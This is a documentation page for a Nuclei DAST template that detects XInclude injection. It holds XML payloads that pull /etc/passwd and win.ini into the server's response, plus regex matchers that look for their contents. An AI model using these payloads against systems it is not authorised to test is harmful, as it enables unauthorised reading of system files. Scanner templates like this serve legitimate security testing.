Skip to content
Nuclei Templates

XInclude Injection - Detection

ID: xinclude-injection

Severity: high

Author: DhiyaneshDK,ritikchaddha

Tags: dast,xxe,xinclude

Description

Section titled “Description”

XInclude is a part of the XML specification that allows an XML document to be built from sub-documents. You can place an XInclude attack within any data value in an XML document, so the attack can be performed in situations where you only control a single item of data that is placed into a server-side XML document.

YAML Source

Section titled “YAML Source”
id: xinclude-injection


info:
  name: XInclude Injection - Detection
  author: DhiyaneshDK,ritikchaddha
  severity: high
  description: |
    XInclude is a part of the XML specification that allows an XML document to be built from sub-documents. You can place an XInclude attack within any data value in an XML document, so the attack can be performed in situations where you only control a single item of data that is placed into a server-side XML document.
  reference:
    - https://d0pt3x.gitbook.io/passion/webapp-security/xxe-attacks/xinclude-attacks
  tags: dast,xxe,xinclude


http:
  - pre-condition:
      - type: dsl
        dsl:
          - 'method == "GET"'


    payloads:
      xinc_fuzz:
        - '<asd xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></asd>'
        - '<asd xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///c:/windows/win.ini"/></asd>'


    fuzzing:
      - part: query
        type: replace # replaces existing parameter value with fuzz payload
        mode: multiple # replaces all parameters value with fuzz payload
        fuzz:
          - '{{xinc_fuzz}}'


    stop-at-first-match: true
    matchers-condition: or
    matchers:
      - type: regex
        name: linux
        part: body
        regex:
          - 'root:.*?:[0-9]*:[0-9]*:'


      - type: word
        name: windows
        part: body
        words:
          - 'for 16-bit app support'
# digest: 490a0046304402207a9b4788db70b76e3e302ea9bcb1db6b7f7e9b54227688c7d8a1ed57482ceb7b0220351c08f3f79d82384fc13d8d8136691ac121a975411566bff706da9302acf29d:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "dast/vulnerabilities/injection/xinclude-injection.yaml"

View on Github